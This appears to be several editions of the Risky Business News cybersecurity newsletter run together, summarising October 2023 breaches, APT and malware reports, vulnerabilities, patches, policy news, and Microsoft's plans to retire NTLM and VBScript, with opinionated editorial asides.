DDOS attack on aid groups: Hacktivists (with the IQ of a box of rocks) are launching DDOS attacks against non-profits providing humanitarian aid to both sides of the Israeli-Palestinian war—because we all know the non-profits are the ones to blame here. DeRp DeRp! [Additional coverage in Reuters]
General tech and privacy
Chrome 118: Google has released version 118 of its Chrome browser. See here for security patches and webdev-related changes. Major changes include a Read Aloud option in Reading Mode, support for storing Chrome passkeys inside the Apple Keychain, a sandboxed network service on Windows, and the automatic disabling of off-Store extensions if users have opted in the Enhanced Safe Browsing mode. The Chrome Safe Browsing interstitials also got a facelift and will now provide users with recommendations.
Windows 10 security updates: Microsoft has fixed an issue where the last Patch Tuesday security updates were not installing on Windows 10 systems. Better check your OS and see if they installed properly.
Ubuntu malicious translation: Canonical has pulled Ubuntu 23.10 installation images after the team discovered offensive language (described as hate speech) in the OS' Ukrainian translation.
Jersey Island outage: Jersey officials blamed "rogue code" for an IT outage that cut off gas supply to the island for almost a week. [Additional coverage in the BBC]
Cookie banner blocking: Mozilla will test a cookie banner blocker in Firefox 120. The test will only include German users (for now).
YouTube's ad-blocking plans: Ad-blocker company AdBlock Plus has criticized Google for its plans to block ad-blockers on YouTube in an effort to shove a metric ton of ads down its users' throats. This is especially annoying for everyone since Google does nothing about malicious ads shown on YouTube.
Microsoft backtracks on OneDrive changes: Microsoft has backtracked on a planned change to its OneDrive service that was meant to go into effect on October 16. After a deluge of negative feedback, the company says that photos stored in the OneDrive Gallery section will not count towards a user's account quota—as it initially intended to do.
Twitter does Musk things: As the EFF's Eva Galperin perfectly explains, in the face of massive misinformation and disinformation campaigns surrounding the war in Israel, Twitter has decided to crack down on sexworkers.
Tech-bro-powered AI is dumb, part 391: A recent analysis has found that all those AI data centers working to sustain the current tech-bro-powered AI investment boom consume astronomical quantities of electricity and water, putting even the cancerours cryptocurrency community to shame. All that energy waste just so some dude can use ChatGPT to answer his girlfriend.
Russia's national firewall:The Insider takes a look at how Russia has built its national firewall system, in many cases, with the help of Western companies.
Government, politics, and policy
US EPA rescinds cybersecurity guidance: The US Environmental Protection Agency (EPA) has retracted cybersecurity guidance it published earlier this year in March. The agency rescinded [PDF] the guidance after a joint lawsuit filed by water companies (AWWA and NRWA) and Republican states. The guidance would have had US states carry out period cybersecurity audits of water utilities. The plaintiffs wanted to block the EPA's new rules and argued for rules developed in collaboration with industry groups, similar to how cybersecurity regulation is passed in the electric sector. [Additional coverage in The Record]
Sandvine pulls out of US market: Network intelligence company Sandvine has abandoned plans to sell a new digital surveillance product in the US. Named Digital Witness, the platform can covertly monitor network traffic and track encrypted communications via Signal or WhatsApp. Bloomberg reports that Sandvine has laid off more than 50 employees who were tasked with demoing and preparing the technology for the US market. Sandvine had already provided trials to the US DEA and state and local law enforcement agencies. It's believed the company's past history of working with authoritarian regimes is what led to its exit. The Digital Witness platform is sold to customers in Europe, Asia, North America, and the Middle East, including the likes of Belarus and Azerbaijan. [Additional coverage in Bloomberg/non-paywall]
Sponsor section
In this Risky Business News sponsor interview, Catalin Cimpanu talks with Airlock Digital founders Daniel Schell and David Cottingham about the recent Microsoft Digital Defense Report and the problem of properly securing PowerShell.
Cybercrime and threat intel
Aviram Azari case: US prosecutors say that an Israeli private investigator named Aviram Azari hired hackers to steal emails from climate activists and leak them to news agencies. The stolen emails were used to write articles criticizing the tactics of climate activists. The articles were then cited in lawsuits involving Exxon Mobil, seeking to dodge investigations about its impact on climate change. US prosecutors have not linked Azari to Exxon Mobile. Prosecutors have asked the judge for a sentence of hundreds of months in prison, while Azari's team is asking for a maximum 60 months prison sentence after he pleaded guilty last year. Azari's sentencing is scheduled this week on October 18. [Additional coverage in Reuters]
Smishing gang detained: Something we missed from August is that Slovenian authorities have detained four Romanians who were running a smishing operation out of the city of Maribor.
Reichsadler Cybercrime Group: Sophos has spotted a new threat actor named the Reichsadler Cybercrime Group using a recent WS_FTP vulnerability (CVE-2023-40044) to breach corporate networks and deploy ransomware.
New npm malware: Forty-three malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.
RedAlert clones: Cloudflare's security team has spotted malicious websites distributing fake versions of RedAlert, an app that sends rocket alerts to Israeli citizens. The malicious apps contain spyware-like behavior.
DDOS attacks against IL-PS sites: NSFOCUS has published a timeline of all the DDOS attacks that have hit Israeli and Palestinian websites since the start of the most recent conflict.
EvilSln: A security researcher has released a technical write-up and proof-of-concept code on how to hide malicious code in Visual Studio SLN project files—a la North Korea.
Malware technical reports
EtherHiding: Guardio Labs look at how a malware gang named ClearFake is using Binance blockchain smart contracts to hide some of its malicious code. Guardio names this technique EtherHiding—spotted earlier this month by FINSIN.
GuLoader: CERT-Slovenia has published a technical analysis of the GuLoader downloader.
SilverFox: Qihoo 360 has a report on recent SilverFox trojan operations.
Akira ransomware: Fortinet looks at recent versions and operations of the Akira ransomware.
Good Day ransomware: ShadowStackRE has published an analysis of the Good Day ransomware. Researchers say the group has been active since May 2023, and they may be the group behind the Cloak dark web leak site.
Sponsor Demo
Airlock Digital CEO David Cottingham shows Patrick Gray how Airlock's execution control and allowlisting solution works.
APTs and cyber-espionage
Sticky Werewolf: A threat actor named Sticky Werewolf is targeting government organizations in Belarus and Russia. The group uses spear-phishing campaigns for initial access and a commodity remote access trojan named NetWire for data collection and exfiltration. According to Russian security firm BI.ZONE, Sticky Werewolf has been active since April this year and has conducted 30 attacks to date.
Void Rabisu: A Russian cyber-espionage group named Void Rabisu has used a Windows zero-day to target EU politicians working on gender equality. The campaign took place in June and used a zero-day (CVE-2023-36884) in the Windows Search feature that Microsoft later patched in August. The campaign aimed to infect victims with a remote access trojan named PEABOD. Also known as RomCom, the Void Rabisu group is a former financially motivated group that has pivoted to cyber-espionage on behalf of the Russian government after its invasion of Ukraine.
BLOODALCHEMY: Elastic's security team has published a technical write-up of BLOODALCHEMY, a new backdoor used by a cyber-espionage group the company calls REF5961. Elastic discovered this yet-to-be-attributed APT group on the network of a Foreign Affairs Ministry from a member of the Association of Southeast Asian Nations (ASEAN).
WinRAR zero-day abused by APT groups: A WinRAR zero-day that was used to hack stock and crypto-traders earlier this year has now entered the arsenal of at least three APT groups. Groups like DarkPink, Russia's APT28, and North Korea's Konni have been spotted using the former zero-day in spear-phishing operations. Patched at the end of August, the former WinRAR zero-day (CVE-2023-38831) allows threat actors to run malicious code on a target's system when they decompress booby-trapped ZIP files.
Lazarus' Volgmer and Scout: AhnLab has published a report on Volgmer and Scout, two new malware strains used by North Korean hackers in recent campaigns. The first is a backdoor/dropper, while the second is a basic downloader.
Operation Dream Magic: The same AhnLab team has also published a report on what they call Operation Dream Magic, a Lazarus cyber espionage campaign targeting South Korea.
IL-PS dis/misinformation campaign: Alethea has published a report on a network of Twitter troll accounts pushing dis/misinformation about the recent Israel-Palestinian conflict.
"Alethea has detected a likely inauthentic, coordinated cluster of at least 67 accounts on X posting near-identical content about the conflict and promoting misleading and out of context translations of statements from Russian President Vladimir Putin and Foreign Minister Sergei Lavrov. Alethea observed both pro-Palestine and pro-Israel content from these accounts, suggesting the network's aim may be to stoke anger on both sides of the conflict or to simply capitalize on the current interest in the topic."
Vulnerabilities, security research, and bug bounty
iOS zero-days: Google has published a technical dive into CVE-2023-28205 and CVE-2023-28206, two iOS zero-days that were patched in April after being abused by surveillance vendors.
Signal zero-day rumor: There's a rumor about a Signal zero-day. Nothing has been confirmed so far, though. Could also be FUD.
Milesight router vulnerability: A severe vulnerability (CVE-2023-43261) has been discovered in Milesight cellular routers that can allow threat actors to retrieve login credentials from log files. Security firm VulnCheck says it found signs of potential exploitation in the wild, although the attacks don't appear to be taking place at scale. The affected Milesight routers are typically used in OT networks to connect industrial control equipment to the internet. While more than 5,800 routers are currently accessible over the internet, VulnCheck says the vulnerability only affects older models running firmware before March 2021.
"If you have a Milesight Industrial Cellular Router, it's probably wise to assume all the credentials on the system have been compromised and to simply generate new ones, and ensure no interfaces are reachable via the internet."
WP plugin zero-day: A threat actor is exploiting a recently patched vulnerability (CVE-2023-5360) in a popular WordPress plugin to install backdoors, create new admin accounts, and take over websites. The attacks are targeting the Royal Elementor Addons and Templates plugin, installed on more than 200,000 WordPress sites. Researchers at Wordfence say the plugin was exploited since the end of August, well before a patch was released last week.
WP security updates: A security update is available for the WordPress CMS, including one RCE.
Juniper security updates: Networking equipment vendor Juniper dozens of security updates for its products.
XORtigate PoC: Lexfo has released a PoC for the XORtigate, a vulnerability (CVE-2023-27997) in Fortinet devices.
Windows EoP PoC: Filip Dragovic has published a PoC for CVE-2023-36723, an elevation of privilege vulnerability in the Windows Container Manager Service.
Upcoming crypto-wallet bug: Unciphered says it will publish details on a major crypto-wallet vulnerability on November 10.
CISA KEV update: CISA has updated the KEV database to show if vulnerabilities have been used in ransomware attacks. The KEV database has recently surpassed the 1,000 entries mark, and the new update is meant to help organizations prioritize patches. The agency has also launched a second database that lists common misconfigurations exploited in ransomware attacks, such as open RDP and VNC ports.
Infosec industry
Former Uber CSO appeals: Former Uber CSO Joseph Sullivan filed an appeal against the DOJ and is seeking a reversal of his conviction and a new trial. Sullivan was sentenced to three years probation for covering up a security breach at Uber in 2016. Sullivan's legal team calls the conviction "profoundly flawed" and claims the DOJ mischaracterized Sullivan's actions. [Additional coverage in SecurityInfoWatch]
New tool—ELITEWOLF: The US NSA has released a GitHub project named ELITEWOLF containing a collection of signatures designed to detect malicious activity on ICS/SCADA/OT networks.
New tool—OpenSSF Malicious Packages: The Open Source Security Foundation has launched the OpenSSF Malicious Packages, a repository containing a list of malicious libraries spotted across the open-source ecosystem.
New tool—QBinDiff: QuarksLab has open-sourced a tool named QBinDiff for binary diffing.
New tool—Stompy: Security researcher Andy Gill has released a tool named Stompy that can timestomp files as part of red-team exercises.
FIRSTCON23 videos: Talks from the FIRSTCON23 security conference, which took place back in June, are available on YouTube.
Legal ransom payment map: Splunk's Ryan Kovar has put together a map with the places where it's legal to pay ransomware groups.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq examine the opportunities that ransomware gangs and business email compromise/romance scammers have to collaborate.
This newsletter is brought to you by Netwrix, an IT security software company that enables security professionals to strengthen their security and compliance posture across all three primary attack vectors: data, identity, and infrastructure. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
Microsoft has announced plans to disable support for the NTLM authentication protocol in a future version of Windows 11.
Even if Microsoft has not put out a hard cut-off date, this is good news regardless, as it sets the stage for the protocol to be removed after 30 years of use.
Short for New Technology LAN Manager, the protocol was introduced in 1993 with the release of Windows NT 3.1. It was the primary user authentication protocol until Windows 2000, when it was replaced by Kerberos.
Since then, NTLM has been included in Windows as a backup authentication protocol for legacy purposes and in situations where Kerberos couldn't work properly. This included offline/local use or (segmented) network topologies where there was no direct line-of-sight to a Domain Controller.
Microsoft says that it is (very well) aware of these issues, and that's why instead of a hard-disable, it will first fix Kerberos' shortcomings first.
The company says it is working on two new Kerberos features named IAKerb and local KDC that will allow Kerberos to work "in more diverse network topologies" and in offline/local scenarios where there's no Domain Controller available.
These features will gradually make their way into Windows 11, but not Windows 10, which is closer to its End-of-Support than most people realize (ahem, two years and one day—October 14, 2025).
The company is also adding tools and logging capabilities to monitor NTLM usage in corporate environments, along with finer-grained group policies to disable or block NTLM.
Once NTLM usage goes down, Microsoft says it will pull the plug and announce a hard date when the protocol will be disabled in Windows 11.
"Reducing the use of NTLM will ultimately culminate in it being disabled in Windows 11. We are taking a data-driven approach and monitoring reductions in NTLM usage to determine when it will be safe to disable."
3Commas hacked again: Cryptocurrency trading platform 3Commas has confirmed a security breach after hackers gained access to customer accounts and made unauthorized transactions. The company didn't reveal how many funds were stolen. This is the company's second breach in the past year. It was also hacked in October of last year after a hacker gained access to its infrastructure and stole customer API keys.
Platypus hacked for the third time: DeFi trading service Platypus has lost more than $2 million worth of crypto assets after an attacker gained access to its systems. The incident marks the third time the platform was hacked this year after suffering similar breaches in January and July. It lost $8.5 million in the first hack and just $50,000 in the second.
FTX hack trail leads back to Russia: An Elliptic investigation found that some of the $477 million crypto assets stolen from cryptocurrency exchange FTX lead back to money laundering accounts that have ties with the Russian cybercrime ecosystem. [Additional coverage in Wired/non-paywall]
"A Russia-linked actor seems a stronger possibility. Of the stolen assets that can be traced through ChipMixer, significant amounts are combined with funds from Russia-linked criminal groups, including ransomware gangs and darknet markets, before being sent to exchanges. This points to the involvement of a broker or other intermediary with a nexus in Russia."
Shadow PC breach: Cloud gaming PC service Shadow has disclosed [archived] a security breach after some of the company's customer data was put up for sale on an underground hacking forum. The incident took place in September after one of its employees was socially-engineered in a Discord chat. The attacker compromised the employee's computer with malware, stole access cookies from the employee's browser, and then accessed the Shadow backend and stole customer data. The company says no passwords or financial data was stolen, but the attacker made off with most user personal data, such as names, emails, billing addresses, and dates of birth.
OneinStack supply chain attacks: Threat actors have compromised the servers of OneinStack, a one-click Linux server deployment utility. In two separate incidents in April and October this year, the attackers modified the OneinStack binaries and added a code that would load and enable a secret backdoor. Chinese security firm QiAnXin says the code used in the two incidents suggests the same threat actor was behind both attacks. The OneinStack tool is very popular in China, where it is used by developers to deploy Linux servers on cloud infrastructure in various production-ready configurations.
23andMe: DNA and genetic testing service 23andMe has confirmed that hackers stole some data after initially denying they got hacked last week. The company is now resetting all user passwords. There's more to this story, but I can't tell what's b.s. and not, so I'll come back to this when things clear up. Meantime, you can read TechCrunch's coverage of what's what right now.
SEC is investigating Progress Software: The US Securities and Exchange Commission has launched a formal investigation into Progress Software, the company behind the MOVEit file-sharing server. According to a regulatory filing, Progress says the SEC has started a fact-finding investigation and is seeking documents from the company related to how the company handled a string of hacks of its MOVEit software earlier this year. Progress says the attacks have incurred $2.9 million in costs so far, but that $1.9 million has already been covered through its insurance. The company also expects to face additional losses, as it currently faces 58 class-action lawsuits, and at least 23 customers have announced their intention to ask for compensation related to the hacks. [Additional coverage in CybersecurityDive]
Steam malware incidents: Valve is requiring that all developers add a phone number to their account in order to publish new game updates on the Steam platform. The company made the decision after several developers had their accounts compromised and hackers pushed malware-laced game updates to some of its users. The phone number will be used for two-factor authentication. Developers will have to add a phone number by October 24, or they will be unable to update any of their games.
General tech and privacy
Microsoft IRS audit: The US Internal Revenue Service has notified Microsoft that the company owes $28.9 billion in back taxes. The decision comes following an IRS audit that looked at how Microsoft allocated profits between countries and jurisdictions between 2004 and 2013. Microsoft says it plans to appeal the decision.
TETRA code going open-source: ETSI, the organization behind the TETRA communications protocol, is considering open-sourcing some of its newer protocols and algorithms after researchers found a series of backdoors in its code in July this year.
Chrome serves propaganda in Russia: An investigation has found that Google Chrome's Discover feed is serving up state-backed propaganda to Russian users. [Additional coverage in Bloomberg/non-paywall]
Quick Chrome history deletion: Google has announced a new feature for its Chrome browser that will allow users to quickly delete the last 15 minutes of their browsing history. The feature is different from incognito windows because it allows access to information like session cookies that would not usually be available in incognito mode. The feature can be found in the same place as the normal Clear Browsing History command.
Government, politics, and policy
Twitter in trouble in the EU: The European Union has sent a letter to Twitter this week warning that the company was spreading disinformation in the aftermath of the Hamas attacks on Israel. The EU Commissioner for Internal Market Thierry Breton has given Twitter CEO Elon Musk 24 hours to take action and respond to the letter. The company is very likely in violation of the EU's new Digital Services Act, which entered into effect at the end of August. Several newsoutlets found that Twitter was flooded with graphic content and disinformation, with Musk himself promoting some of the content. [Additional coverage in CNBC]
Delete Act: California Governor Gavin Newsom has signed a bill into law that allows Californians to request that their personal data be deleted from the servers of online companies. Named the Delete Act, the law is modeled after the EU's GDPR regulation. The law also tasks the California Privacy Protection Agency with creating a single portal where individuals could order data brokers registered in the state to delete their personal data. The agency must launch the portal by January 1, 2026. [Additional coverage in The Verge]
Netherlands investigates Yandex: The Dutch Data Protection Agency is investigating Yango, the ride-hailing app owned by Russian tech group Yandex. Officials fear Russian secret services might abuse the app to gather data on EU citizens. The app is facing similar investigations in Finland and Norway. [Additional coverage in ChannelNewsAsia]
Sponsor section
In this Risky Business News sponsor interview, Tom Uren asks Martin Cannard, VP of Product Strategy at Netwrix, how privileged access management can help defend organizations. "Advanced Persistent Teenagers" regularly use social engineering techniques to compromise highly privileged accounts, but that doesn't mean it's instantly game over.
Cybercrime and threat intel
Fair Russia is fair: Russian authorities have detained a Yekaterinburg man for including a Facebook button on the website of an NGO. The suspect was detained because Facebook is considered a terrorist organization in Russia and absolutely 100% not because he's the lead of a human rights organization that has sued the Russian government for the living conditions in its jails. Nope. Not that! [Additional coverage in Veved]
PyPI malware: DevSecOps companies Checkmarx and Phylum have discovered a series of malicious libraries on the PyPI portal, posing as the SDKs of various cloud service providers. The packages contained functional code but also included a hidden mechanism that stole any authentication tokens and credentials added by developers. So far, researchers have identified five malicious SDKs targeting AWS, Alibaba Cloud, Tencent, and Telegram services.
NuGet malware: Security researchers have found malicious NuGet packages infecting developer systems with the SeroXen RAT. Only a handful of malicious packages were discovered, all uploaded on NuGet by one developer account.
KEV update: CISA has updated its KEV database with five new vulnerabilities that are currently being exploited in the wild. The list includes the three zero-days from this week's Microsoft Patch Tuesday, a Cisco zero-day from last month, and an Adobe Reader bug that was patched back in January but is now being exploited.
LinkedIn Smart Links abuse: Threat actors are abusing a LinkedIn feature named Smart Links to bypass security email gateways. The feature is used by LinkedIn paying customers to track who clicks on their links by passing all traffic through the official LinkedIn domain. Researchers at Cofense say they've seen this feature abused for the first time in September 2022 and again in a new campaign started in July this year. The recent campaign leveraged a LinkedIn smart link but eventually redirected users to a phishing site that attempted to harvest their Microsoft credentials.
Magniber ransomware:AhnLab says the last time it detected the Magniber ransomware was on August 25, representing the longest period of inactivity for the ransomware gang since 2016.
"Since its initial appearance in 2016, Magniber has never taken a break from distribution for such a long period of time (usually resuming distribution with a new technique to bypass detection within 2 weeks to a month)."
DarkEye Stealer is back and free: CyFirma security researcher Kaushík Pał has discovered a threat actor distributing a version of the DarkEye Stealer for free. That's exactly what we needed—free advanced malware.
Anonymous Sudan Telegram stats: Threat intel analyst Julian B. has noticed that the follower count of the Anonymous Sudan Telegram channel has nearly doubled over the past week since the group has announced its intention to attack Israeli organizations in the aftermath of the Hamas attack on Israel.
Ransomware in Q3: CyberInt has a breakdown of ransomware operations in the third quarter of the year.
Malware technical reports
AvosLocker: CISA and the FBI have published an update for their malware report on the AvosLocker ransomware. The original report was published in March 2022, so it became outdated.
Qakbot: Blackberry looks at Qakbot, the botnet that was recently taken down by the FBI and EU authorities.
DarkGate: Trend Micro reports an uptick in campaigns distributing the new DarkGate loader via Skype and Microsoft Teams conversations.
Nexus: Two security researchers have found an SQLi vulnerability in the Nexus Android botnet and used it to gain access to its backend and gather intelligence on its operations. The botnet is a variant of the old SOVA Android botnet that launched earlier this year, advertised on underground hacking forums.
SpyNote: WithSecure has published a report on the SpyNote Android malware and its Diehard service that makes shutting down and removing the malware from infected hosts as difficult as possible.
Sponsor Section
To protect your business, you need to understand and measure your attack surface and then implement a continuous, comprehensive approach to reducing it. Read Netwrix's guide to learn how to reduce your privileged attack surface and adopt a Zero Trust approach.
APTs and cyber-espionage
Storm-0062: A suspected Chinese cyber-espionage group is behind the recent attacks that have exploited a zero-day vulnerability in Atlassian Confluence servers. Tracked as CVE-2023-22515, the vulnerability was patched last week, but Microsoft says the group has been exploiting it since mid-September. Microsoft linked the attacks to a group the company tracks as Storm-0062. While the company didn't formally link the attacks to China, it says the same group is also known as DarkShadow and Oro0lxy. In 2020, the US Justice Department indicted an employee of China's Ministry of State Security named Li Xiaoyu, who operated using the "Oro0lxy" nickname and had been involved in MSS hacking campaigns for at least ten years.
ToddyCat:Check Point and Kaspersky have seen the ToddyCat APT executing a persistent hacking and cyber-espionage campaign against the telecom industry in Asia. The campaign has been active since 2021 and has targeted telecoms located in Vietnam, Uzbekistan, Pakistan, and Kazakhstan. The group has been previously linked to Chinese espionage interests.
Vulnerabilities, security research, and bug bounty
Patching priority confusion: A survey of 1,000 IT professionals found that vulnerability scanning and management tools often produce different results that confuse DevOps teams. Nearly three-quarters of respondents say their organizations can take anywhere from two weeks to a month to patch known critical vulnerabilities. Respondents say they spend too much time determining what needs to be fixed first, which has impacted their delivery schedules throughout the past year and even their bottom lines.
cURL security update: The cURL library has patched a rare security vulnerability in its code. The bug is tracked as CVE-2023-38545, and it's a heap buffer overflow in the library's SOCKS5 proxy handshake. The library's author has a write-up here.
Magento patch: A major vulnerability has been fixed in the Adobe Commerce platform and the Magento open-source project. The vulnerability allows threat actors to bypass authentication procedures and hijack any Magento customer account. Patches have been released this week as part of Adobe's Patch Tuesday updates. A technical analysis of the bug will be available via SanSec.
Apple security updates: Apple has backported its recent patches against two zero-days to its older iOS 16.x branch. Initial patches for the iOS 17.x branch were delivered last week.
Squid vulnerabilities: Security researcher Joshua Rogers has discovered 55 vulnerabilities in the highly popular Squid caching proxy. The vulnerabilities were found during a security audit that began in February 2021. Of the 55 vulnerabilities, Rogers says the Squid Team only managed to patch 20. Rogers blamed the lack of patches for all issues on the team's understaffing. The Squid proxy is one of today's most ubiquitous apps, with more than 2.5 million instances available online.
"The Squid Team have been helpful and supportive during the process of reporting these issues. However, they are effectively understaffed, and simply do not have the resources to fix the discovered issues. Hammering them with demands to fix the issues won't get far."
Yifan vulnerabilities: Cisco Talos researchers have discovered ten vulnerabilities in Yifan YF325, a cellular router used in industrial networks. All ten vulnerabilities are rated critical and have a severity score of 9.8/10. All ten remain unpatched after the vendor has failed to respond to Cisco's disclosure attempt.
OctoPrint vulnerability: Numen Labs has found a vulnerability (CVE-2023-41047) in the OctoPrint 3D printer that can be abused to execute arbitrary commands.
WS_FTP exploitation: SentinelOne has a write-up of the recent attacks targeting WS_FTP servers.
Windows zero-day report: Google Project Zero has a technical write-up on CVE-2023-36802, a zero-day in the Windows Kernel Streaming Server that Microsoft patched last month in September. IBM published a similar report earlier this week.
Microsoft AI Bug Bounty Program: Microsoft has announced a new bug bounty program that will pay bug hunters for issues in the company's Bing AI system. Rewards can go up to $15,000.
Infosec industry
Acquisition news: Cybersecurity firm Arctic Wolf has announced plans to acquire security orchestration, automation, and response (SOAR) platform Revelstoke.
New tool—CCB Browser Extension: The Belgian government has developed a Chrome browser extension that shows trustworthiness scores for websites and warns users of phishing attempts.
New tool—machofile: Security researcher Pasquale Stirparo has open-sourced machofile, a tool for parsing Mach-O binary files.
Useful tool: OSINT threat analyst Cipher387 has put together a list of APIs that can be used for OSINT investigations.
Useful tool: Another useful tool is Dangerzone, a tool from the Freedom of the Press Foundation that takes suspicious PDFs and converts them into safe-to-view documents.
Ransomware payments: A Splunk survey of 350 CISOs found that 96% worked for companies that got hit by ransomware over the past year, and a whopping 83% ended up paying the attackers. The survey found that the vast majority paid the attackers through an intermediary, such as a negotiator or their cyber insurance provider. A quarter of all paid ransoms were above $250,000, making the attacks a very lucrative business for ransomware gangs. [Additional coverage on the Splunk website]
"The cyber insurance process has changed over the past few years. It is getting to the point where we are wondering if it is worth our time."
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq examine the opportunities that ransomware gangs and business email compromise/romance scammers have to collaborate.
This newsletter is brought to you by Netwrix, an IT security software company that enables security professionals to strengthen their security and compliance posture across all three primary attack vectors: data, identity, and infrastructure. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
Microsoft has deprecated VBScript, a powerful scripting language that has been part of the Windows operating system since 1998.
VBScript has been made a "Feature on Demand" (FoD), and Microsoft plans to remove it completely in a future version of Windows.
As a FoD, Microsoft says VBscript will be preinstalled on Windows OS images but not enabled by default.
It's quite a rare case for Microsoft to move an older feature to a VoD before removing support. The company says it's doing this "to allow for uninterrupted use while [users] prepare for the retirement of VBScript."
Microsoft made the major announcement in a short statement on Monday but without a clear timeline for VBScript's permanent removal.
While VBScript has a large fanbase among system administrators, the language itself has been left for dead for more than a decade, with the last significant release, VBScript 5.8, coming in 2010.
Since then, Microsoft has replaced VBScript with a much more powerful scripting language named PowerShell.
In 2019, Microsoft also removed VBScript from its Internet Explorer browser in a move that signaled that VBScript's end was nigh.
While the reasons to remove VBScript support most likely lie with PowerShell being a superior tool, VBScript's removal will have a huge security impact as well.
VBScript has been and remains a popular tool amongst malware developers, even today, 27 years after its creation back in 1996. It is not as popular as it once was, but there are still malware gangs using it here and there.
Just like Microsoft dropping support for macros in Office applications, the move is most likely to trigger a shift in how malware will be written and distributed. It will not be a massive shift since all the big-boy gangs have been using PowerShell for a while now, but the older gangs and the copy-pasta malware devs will most likely be impacted.
Back in March this year, Neowin reported that VBScript was most likely the bin later this fall. VBScript's move to a FoD is most likely taking place with a Patch Tuesday update this or next month. Look for VBScript in the "optional features" section going forward.
Image via XenoPanther
Breaches, hacks, and security incidents
Hacker returns HTX funds: The hacker who stole $8 million from the HTX cryptocurrency platform has returned all the stolen funds. Formerly known as Huobi, the company has confirmed the refunds and a $400,000 "whitehat reward." The hacker returned the funds two weeks after the original theft. [Additional coverage in Cryptopolitan]
Air Europa skimming incident: Spanish airline Air Europa has disclosed a security breach after it found a web skimmer on its online website.
SK NEC hack: North Korean hackers have breached South Korea's National Election Commission and stole confidential information. The hack took place in April 2021 but was only disclosed this week. South Korea's National Intelligence Service (NIS) has attributed the intrusion to a North Korean hacking group known as Kimsuky. Officials say the hack compromised the email account of one of the commission's workers but did not say what information the hackers stole. [Additional coverage in NKEconomy]
Attacks on Israel's rocket alerting system: Pro-Palestine hacktivist groups have launched several cyberattacks that targeted Israel's rocket alert system. DDoS attacks hit endpoints responsible for alerting citizens of incoming missile raids, even as early as one hour after the Hamas operation began. Several groups participated in the attacks, such as Anonymous Sudan, Killnet, and AnonGhost. The latter also exploited vulnerabilities in the API system of Red Alert, an Android app that sends rocket alerts to Israeli citizens. The group abused the API to send fake rocket and nuclear bomb alerts meant to sow panic among the Israeli population. [Additional coverage in the Washington Post/non-paywall]
General tech and privacy
Rust in Android:Google says it has started to use the Rust programming language to rewrite parts of the Android kernel. The company has already been using Rust for some Android userland processes since last year. So far, Google developers have rewritten the Android Virtualization Framework's protected VM (pVM) firmware in Rust, but more components will follow.
Google makes passkeys default sign-in: Google is making passkeys the default sign-in option for all Google online accounts. The company will begin showing prompts to all users to enroll a passkey in the coming weeks. Enrolling will require users to register a fingerprint, a facial scan, or a PIN code on a laptop or smartphone they own. The next time users log into their Google accounts, they'll have to authenticate on the device with the passkey of their choosing and skip entering a password or MFA code.
Government, politics, and policy
US joint guidance: CISA, the FBI, the NSA, and the US Treasury have published a joint advisory on improving the security of open source software (OSS) in operational technology (OT) and industrial control systems (ICS).
India investigations Xiaomi and Vivo: Indian authorities have launched an investigation into Chinese companies Xiaomi and Vivo Mobile for allegedly funding an Indian website that was spreading pro-Chinese propaganda. [Additional coverage in Reuters]
Vietnam is a Predator customer: A threat actor tracked as REPLYSPY has used Twitter replies as a means to distribute infection links for the Predator spyware. The links were posted online earlier this year as replies to tweets from EU and US officials, journalists, and experts on Southeast Asian issues. Experts believe the group tried to infect the officials, as well as some of their more important followers. Independent reports from Amnesty International and CitizenLab claim the Vietnamese government is behind the REPLYSPY group after it became a customer of the Intellexa alliance in 2020.
Sponsor section
In this Risky Business News sponsor interview, Tom Uren asks Martin Cannard, VP of Product Strategy at Netwrix, how privileged access management can help defend organizations. "Advanced Persistent Teenagers" regularly use social engineering techniques to compromise highly privileged accounts, but that doesn't mean it's instantly game over.
Cybercrime and threat intel
HelloKitty leak: The source code of the HelloKitty ransomware has been leaked on an underground hacking forum, per threat intel analyst 3xp0rt. The ransomware was first spotted in late 2020, was also known as FiveHands, and its dark web leak site was last seen online in November 2021. The group's main claim to fame is the attack on Polish gaming studio CD Projekt Red, the maker of the Witcher and Cyberpunk games.
Postal service phishing:KrebsOnSecurity looks at the increase in phishing operations impersonating USPS and 12 other US postal services.
Israel-Palestine hacktivism: Threat intel analyst CyberKnow is maintaining a list of hacktivist groups that announced their involvement in the Israel-Palestine hostilities. The list includes 50 groups, with 48 on Palestine's side.
HTTP/2 Rapid Reset:Google, Amazon, and Cloudflare have discovered a new DDOS attack method named Rapid Reset. The technique exploits a feature in the HTTP/2 protocol to send a large number of requests to modern web servers and then immediately cancel the connection. All three companies say the technique has been used in August and September to launch some of the largest attacks they have ever seen. The largest attack hit Google Cloud and clocked in at 398 million requests per second, almost nine times the previous record of 46 million requests per second. Patches, tracked under CVE-2023-44487, have started rolling out to various servers and networking libraries.
Malware technical reports
Magecart campaign hides in 404 pages: A threat actor is hacking online stores and hiding malicious web skimmer code in 404 pages. The campaign has been active for a couple of weeks and has targeted online stores hosted using Magento and WooCoomerce. Akamai says that when customers try to make a purchase, the hacked website loads the malicious code from the 404 page. The code shows a fake payment form that collects a user's personal and payment information, which is then sent to an attacker's server.
IZ1H9 botnet: Throughout September 2023, the IZ1H9 botnet has expanded its exploit arsenal with 13 new vulnerabilities. This includes exploits in D-Link devices, Netis wireless routers, Sunhillo SureLine surveillance systems, Geutebruck IP cameras, Yealink Device Management systems, Zyxel devices, TP-Link Archer routers, Korenix Jetwave access points, and TOTOLINK routers.
ADVobfuscator: OALABS looks at how malware authors are abusing the ADVobfuscator library to obfuscate their code.
Sponsor Section
To protect your business, you need to understand and measure your attack surface and then implement a continuous, comprehensive approach to reducing it. Read Netwrix's guide to learn how to reduce your privileged attack surface and adopt a Zero Trust approach.
APTs and cyber-espionage
Caracal Kitten: Chinese security firm QiAnXin has discovered a new APT group spreading Android malware to members of the Kurdish population. Named Caracal Kitten, or APT-Q-58, the group hid its malware in apps posing as news portals and the official app for the Kurdistan Democratic Party (KDP). While no formal attribution has been made, QiAnXin says the group's target selection overlaps with past Iranian operations.
